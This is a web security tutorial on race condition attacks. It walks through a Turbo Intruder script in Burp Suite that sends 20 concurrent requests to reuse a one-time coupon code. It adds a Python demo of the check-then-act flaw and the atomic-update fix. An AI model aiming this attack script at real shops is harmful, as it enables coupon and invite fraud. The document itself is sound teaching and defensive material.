Web Race Condition Attack
Last modified: 2023-08-14
A race condition is a web application vulnerability in which concurrent requests circumvent a limit that the application enforces on its state.
If the target website lets a logged-in user apply a 10% off code when buying products, the code should normally be applicable only once. However, this rule might be bypassed by exploiting a race condition with concurrent requests.
We can easily carry out a race condition attack by using Turbo Intruder.
In Burp Suite, right-click on the specific request.
Select Extensions → Turbo Intruder. If it does not exist, you need to install it from the BApp Store in Burp Suite.
In the Turbo Intruder window, set the concurrentConnections parameter of the RequestEngine call to a specific value. This value depends on the target website's logic. For example, if we need to apply a coupon code 20 times on an e-commerce (EC) site, set it as follows:
    def queueRequests(target, wordlists):
        engine = RequestEngine(
            endpoint=target.endpoint,
            concurrentConnections=20,  # change this value for race condition.
            requestsPerConnection=1,
            pipeline=False)

        # For loop requests
        i = 0
        while i < 100:  # this value is arbitrary but not very important for this situation.
            engine.queue(target.req, None)
            i += 1


    def handleResponse(req, interesting):
        if interesting:
            table.add(req)
Now click the Attack button. Since the request is sent N times at the same time, we may be able to bypass the limit on applying a code, e.g. a coupon or invite code.
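Why the concurrent requests get past the one-time limit, and the server-side fix, shown as an added example that is not part of the original page: redeem_vulnerable checks the coupon and marks it used in two separate statements, while redeem_atomic does both in one conditional UPDATE. The coupon table, the code SAVE10, the function names and the barrier that stands in for request latency are all assumptions constructed for illustration.

```python
import sqlite3
import threading
from concurrent.futures import ThreadPoolExecutor

N = 20  # simultaneous requests, like concurrentConnections=20 above


def make_db():
    # Shared in-memory database; db_lock makes each single statement atomic,
    # as a database server would. Table and coupon code are constructed samples.
    db = sqlite3.connect(":memory:", check_same_thread=False, isolation_level=None)
    db.execute("CREATE TABLE coupons (code TEXT PRIMARY KEY, used INTEGER NOT NULL)")
    db.execute("INSERT INTO coupons VALUES ('SAVE10', 0)")
    return db, threading.Lock()


def redeem_vulnerable(db, db_lock, gate):
    # Check, then act: two separate statements leave a race window between them.
    with db_lock:
        used = db.execute("SELECT used FROM coupons WHERE code = 'SAVE10'").fetchone()[0]
    gate.wait()  # models latency: every request has checked before any request writes
    if used:
        return False
    with db_lock:
        db.execute("UPDATE coupons SET used = 1 WHERE code = 'SAVE10'")
    return True  # discount granted


def redeem_atomic(db, db_lock, gate):
    gate.wait()  # all requests arrive together
    # Check and act in one statement: only one request can flip used from 0 to 1.
    with db_lock:
        cur = db.execute("UPDATE coupons SET used = 1 WHERE code = 'SAVE10' AND used = 0")
        return cur.rowcount == 1


def race(redeem):
    # Fire N requests at once and count how many were granted the discount.
    db, db_lock = make_db()
    gate = threading.Barrier(N)
    with ThreadPoolExecutor(max_workers=N) as pool:
        futures = [pool.submit(redeem, db, db_lock, gate) for _ in range(N)]
        return sum(f.result() for f in futures)


if __name__ == "__main__":
    print("check-then-act discounts granted:", race(redeem_vulnerable))
    print("atomic update discounts granted: ", race(redeem_atomic))
```

In a real application the same guarantee comes from the conditional UPDATE (or a unique constraint on redemptions) executed inside the database, so it holds across application servers as well as threads.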